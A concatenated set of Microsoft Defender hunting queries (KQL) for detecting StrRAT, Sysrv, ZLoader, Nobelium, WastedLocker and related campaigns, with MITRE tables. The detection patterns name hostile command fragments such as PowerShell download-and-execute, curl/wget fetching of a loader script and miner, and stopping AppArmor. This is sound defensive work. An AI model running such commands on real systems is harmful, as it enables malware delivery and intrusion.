'31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427')
================================================
FILE: Campaigns/StrRAT malware/StrRAT-AV-Discovery.md
================================================
# StrRAT Malware AV Discovery
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the infected machine based on C2 server command. Additionally, this threat also has a ransomware encryption/decryption module which appends .crimson extension.
## Query
The following query looks for instances of defense evasion behavior, whereby the malware attempts to discover the Antivirus production solutions in place on the compromised device.
```
DeviceProcessEvents
| where InitiatingProcessFileName in~("java.exe", "javaw.exe") and InitiatingProcessCommandLine has "roaming"
| where FileName == 'cmd.exe' and ProcessCommandLine has 'path antivirusproduct get displayname'
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/StrRAT malware/StrRAT-Email-Delivery.md
================================================
# StrRAT Malware Email Delivery
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the infected machine based on C2 server command. Additionally, this threat also has a ransomware encryption/decryption module which appends .crimson extension.
## Query
The following query looks for emails containing domains known to be associated with delivering StrRAT malware.
```
EmailUrlInfo
| where UrlDomain has_any ('metroscaffingltg.co.uk',
'pg-finacesolutions.co.uk',
'jpfletcherconsultancy.co.uk',
'buildersworlinc.co.uk',
'bentlyconstbuild.co.uk',
'alfredoscafeltd.co.uk',
'zincocorporation.co.uk',
'playerscircleinc.co.uk',
'tg-cranedinc.co.uk',
'adamridley.co.uk',
'westcoasttrustedtaxis.co.uk',
'sivospremiumclub.co.uk',
'gossyexperience.co.uk',
'jeffersonsandc.co.uk',
'fillinaresortsltd.co.uk',
'tk-consultancyltd.co.uk')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/StrRAT malware/StrRAT-Malware-Persistence.md
================================================
# StrRAT Malware Persistence
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the infected machine based on C2 server command. Additionally, this threat also has a ransomware encryption/decryption module which appends .crimson extension.
## Query
The following query looks for the scheduled task named "Skype," which is created by the StrRAT JAR file. This creates persistence on the impacted machine.
```
DeviceProcessEvents
| where InitiatingProcessFileName in~("java.exe","javaw.exe")
| where FileName == 'cmd.exe' and ProcessCommandLine has_all("schtasks /create", "tn Skype")
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/Sysrv-botnet/app-armor-stopped.md
================================================
# AppArmor service stopped
This query was originally published in the threat analytics report, *Sysrv botnet evolution*.
Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
The following query finds instances of the attacker attempting to stop the AppArmor network security service on devices running Linux.
## Query
```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine has "/bin/bash /tmp/" and ProcessCommandLine has "service apparmor stop"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
Technique, tactic, or state | Covered? (v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | v |
Ransomware | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Sysrv-botnet/java-executing-cmd-to-run-powershell.md
================================================
# Java process executing command line to download and execute PowerShell script
This query was originally published in the threat analytics report, *Sysrv botnet evolution*.
Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
The following query finds instances of the Java process being used to execute cmd.exe, and download and execute a PowerShell script.
## Query
```kusto
DeviceProcessEvents
| where InitiatingProcessFileName == 'java.exe' and FileName == 'cmd.exe'
and ProcessCommandLine has_all('powershell iex','DownloadString')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
Technique, tactic, or state | Covered? (v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | v |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | |
Ransomware | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Sysrv-botnet/kinsing-miner-download.md
================================================
# Kinsing miner download
This query was originally published in the threat analytics report, *Sysrv botnet evolution*.
Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
The following query finds instances where the attacker commanded the Kinsing miner file to be downloaded on Linux devices.
## Query
```kusto
DeviceProcessEvents
| where ProcessCommandLine has_all('curl', '-o /etc/kinsing')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
Technique, tactic, or state | Covered? (v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | v |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | v |
Ransomware | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Sysrv-botnet/oracle-webLogic-executing-powershell.md
================================================
# Oracle WebLogic process wlsvcX64.exe exploitation and execution of PowerShell script to download payloads
This query was originally published in the threat analytics report, *Sysrv botnet evolution*.
Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
The following query finds instances of Oracle WebLogic being exploited to run a PowerShell script that downloads payloads.
## Query
```kusto
union DeviceProcessEvents, DeviceFileEvents
| where InitiatingProcessParentFileName =~ 'wlsvcX64.exe' and InitiatingProcessFileName =~ 'powershell.exe'
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
Technique, tactic, or state | Covered? (v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | v |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | |
Ransomware | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Sysrv-botnet/rce-on-vulnerable-server.md
================================================
# Remote code execution on vulnerable server
This query was originally published in the threat analytics report, *Sysrv botnet evolution*.
Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
The following query finds instances of remote code execution on a vulnerable Linux server.
## Query
```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine has "php-cgi.exe"
| where ProcessCommandLine has_all ('curl -fsSL', '/ldr.sh', 'wget -q -O')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
Technique, tactic, or state | Covered? (v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | v |
Ransomware | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Sysrv-botnet/tomcat-8-executing-powershell.md
================================================
# Tomcat 8 process executing PowerShell command line to perform data exploitation activities and setting up scheduler tasks.
This query was originally published in the threat analytics report, *Sysrv botnet evolution*.
Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
The following query finds instances of Apache Tomcat 8 being exploited to execute encoded PowerShell commands.
## Query
```kusto
DeviceProcessEvents
| where InitiatingProcessParentFileName startswith 'tomcat'
| where InitiatingProcessFileName in~("cmd.exe", "powershell.exe") and InitiatingProcessCommandLine hasprefix '-enc '
and ProcessCommandLine has_any ('cmd.exe','powershell.exe','sc.exe','schtasks.exe','WMIC.exe')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
Technique, tactic, or state | Covered? (v=yes) | Notes
-|-|-
Initial access | |
Execution | v |
Persistence | |
Privilege escalation | |
Defense evasion | v |
Credential Access | |
Discovery | |
Lateral movement | |
Collection | |
Command and control | |
Exfiltration | |
Impact | |
Vulnerability | |
Exploit | |
Misconfiguration | |
Malware, component | |
Ransomware | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/Threat actor Phosphorus masquerading as conference organizers.md
================================================
# Threat actor Phosphorus masquerading as conference organizers
Identify prior activity from this campaign using IOCs shared by Microsoft’s Threat Intelligence Center, or MSTIC.
Read more: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/
## Query
```
//All emails from the threat actor Phosphorus, masquerading as conference organizers, based on the IOCs shared
// by Microsoft’s Threat Intelligence Center in: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/
let MaliciousSenders = dynamic(["t20saudiarabia@outlook.sa", "t20saudiarabia@hotmail.com", "t20saudiarabia@gmail.com", "munichconference@outlook.com",
"munichconference@outlook.de", "munichconference1962@gmail.com"]);
EmailEvents
| where SenderFromAddress in~ (MaliciousSenders)
//Filter for emails that were delivered check the FinalEmailAction to see if there was policy applied on this email
let MaliciousSenders = dynamic(["t20saudiarabia@outlook.sa", "t20saudiarabia@hotmail.com", "t20saudiarabia@gmail.com", "munichconference@outlook.com",
"munichconference@outlook.de", "munichconference1962@gmail.com"]);
EmailEvents
| where SenderFromAddress in~ (MaliciousSenders) and DeliveryAction == "Delivered"
//Filter for emails that were delivered and check if there was any action taken on them post delivery, by joining with EmailPostDeliveryEvents
let MaliciousSenders = dynamic(["t20saudiarabia@outlook.sa", "t20saudiarabia@hotmail.com", "t20saudiarabia@gmail.com", "munichconference@outlook.com",
"munichconference@outlook.de", "munichconference1962@gmail.com"]);
EmailEvents
| where SenderFromAddress in~ (MaliciousSenders) and DeliveryAction == "Delivered"
| join EmailPostDeliveryEvents on NetworkMessageId, RecipientEmailAddress
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | V | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## Contributor info
**Contributor:** Tali Ash
**GitHub alias:** tali-ash
**Organization:** Microsoft
**Contact info:** @Taliash1
================================================
FILE: Campaigns/WastedLocker Downloader.md
================================================
# WastedLocker Downloader
This query identifies the launch pattern associated with wastedlocker ransomware.
Reference writeup: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us
## Query
```
DeviceProcessEvents
| where InitiatingProcessFileName =~ 'wscript.exe' and FileName =~ 'powershell.exe' and InitiatingProcessCommandLine matches regex @"(?i)\\chrome\.update\..+?\.js"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution |v| |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## Contributor info
**Contributor:** Michael Melone
**GitHub alias:** mjmelone
**Organization:** Microsoft
**Contact info:** @PowershellPoet
================================================
FILE: Campaigns/ZLoader/Malicious bat file.md
================================================
# Malicious .bat file in suspicious Oracle Java SE folder path
ZLoader was delivered in a campaign in late summer 2021. This campaign was tweeted by @MsftSecIntel on twitter.
## Query
This query looks for the suspicious .bat file placed in the folder using a specific naming convention purporting to be Java-related.
```
DeviceFileEvents
| where FileName endswith '.bat'
and FolderPath has @'Program Files (x86)\Sun Technology Network\Oracle Java SE'
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/ZLoader/Payload Delivery.md
================================================
# Tim.exe payload delivery
ZLoader was delivered in a campaign in summer 2021 via malvertising. This campaign was tweeted about by @MsftSecIntel on twitter.
## Query
This query looks for delivery of the malicious payload, Tim.exe.
```
DeviceNetworkEvents
| where InitiatingProcessFileName =~ 'powershell.exe'
and InitiatingProcessCommandLine has('Invoke-WebRequest') and InitiatingProcessCommandLine endswith '-OutFile tim.EXE'
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/ZLoader/Suspicious Registry Keys.md
================================================
# Suspicious Registry Keys
ZLoader was delivered in a campaign in late summer 2021 using malvertising to download malicious .msi files onto affected machines. This campaign was originally tweeted by @MsftSecIntel on Twitter.
In this campaign, the malicious .msi files create registry keys that use that attacker-created comapny names.
## Query
This query looks for the suspicious registry keys created by the attacker-created companies.
```
DeviceRegistryEvents
| where RegistryValueData in('Flyintellect Inc.', 'Datalyst ou')
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/apt sofacy zebrocy.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy_zebrocy.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine endswith "cmd.exe /c SYSTEMINFO & TASKLIST"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/apt sofacy.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine matches regex @'rundll32\.exe %APPDATA%.*\.dat",'
or ProcessCommandLine matches regex @'rundll32\.exe %APPDATA%.*\.dll",#1'
| top 100 by Timestamp desc
================================================
FILE: Campaigns/apt ta17 293a ps.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_ta17_293a_ps.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine =~ "ps.exe -accepteula"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/apt tropictrooper.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_tropictrooper.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine contains "abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/apt unidentified nov 18.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_unidentified_nov_18.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine endswith "cyzfc.dat, PointFunctionCall"
| top 100 by Timestamp desc
DeviceFileEvents
| where Timestamp > ago(7d)
| where FolderPath has "ds7002.lnk"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/c2-lookup-from-nonbrowser[Nobelium].md
================================================
# Locate Nobelium implant receiving DNS response
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.
The following query detects events when Nobelium received a DNS response after launching a lookup request to known command-and-control infrastructure.
More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
## Query
```kusto
DeviceEvents
| where ActionType == "DnsQueryResponse" //DNS Query Response
and AdditionalFields has ".avsvmcloud"
IdentityQueryEvents
| where ActionType == "DNS query"
| where QueryTarget has "appsync-api" or QueryTarget has "avsvmcloud.com"
| project Timestamp, QueryTarget, DeviceName ,IPAddress,ReportId
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/c2-lookup-response[Nobelium].md
================================================
# Locate Nobelium implant receiving DNS response
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.
The following query detects events when Nobelium received a DNS response after launching a lookup request to known command-and-control infrastructure.
More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
## Query
```kusto
DeviceEvents
| where ActionType == "DnsQueryResponse" //DNS Query Response
and AdditionalFields has ".avsvmcloud"
IdentityQueryEvents
| where ActionType == "DNS query"
| where QueryTarget has "appsync-api" or QueryTarget has "avsvmcloud.com"
| project Timestamp, QueryTarget, DeviceName, IPAddress, ReportId
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Microsoft 365 Defender team
================================================
FILE: Campaigns/cobalt-strike-invoked-w-wmi.md
================================================
# Detect Cobalt Strike invoked via WMI
This query was originally published in the threat analytics report, *Ryuk ransomware*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/).
[Ryuk](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ryuk&threatId=-2147232689) is human-operated ransomware. Much like [DoppelPaymer](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/) ransomware, Ryuk is spread manually, often on networks that are already infected with Trickbot.
During the earliest stages of a Ryuk infection, an operator downloads [Cobalt Strike](https://www.cobaltstrike.com/), a penetration testing kit that is also used by malicious actors. Cobalt Strike is used by Ryuk operators to explore the network before deploying the Ryuk payload. This malicious behavior is often obscured by Base64 encoding and other tricks.
The following query detects possible invocation of Cobalt Strike using [Windows Management Instrumentation](https://docs.microsoft.com/windows/win32/wmisdk/wmi-start-page) (WMI).
The [See also](#See-also) section below lists links to other queries associated with Ryuk ransomware.
## Query
```Kusto
// Find use of Base64 encoded PowerShell
// Indicating possible Cobalt Strike
DeviceProcessEvents
| where Timestamp > ago(7d)
// Only WMI-initiated instances, remove to broaden scope
| where InitiatingProcessFileName =~ 'wmiprvse.exe'
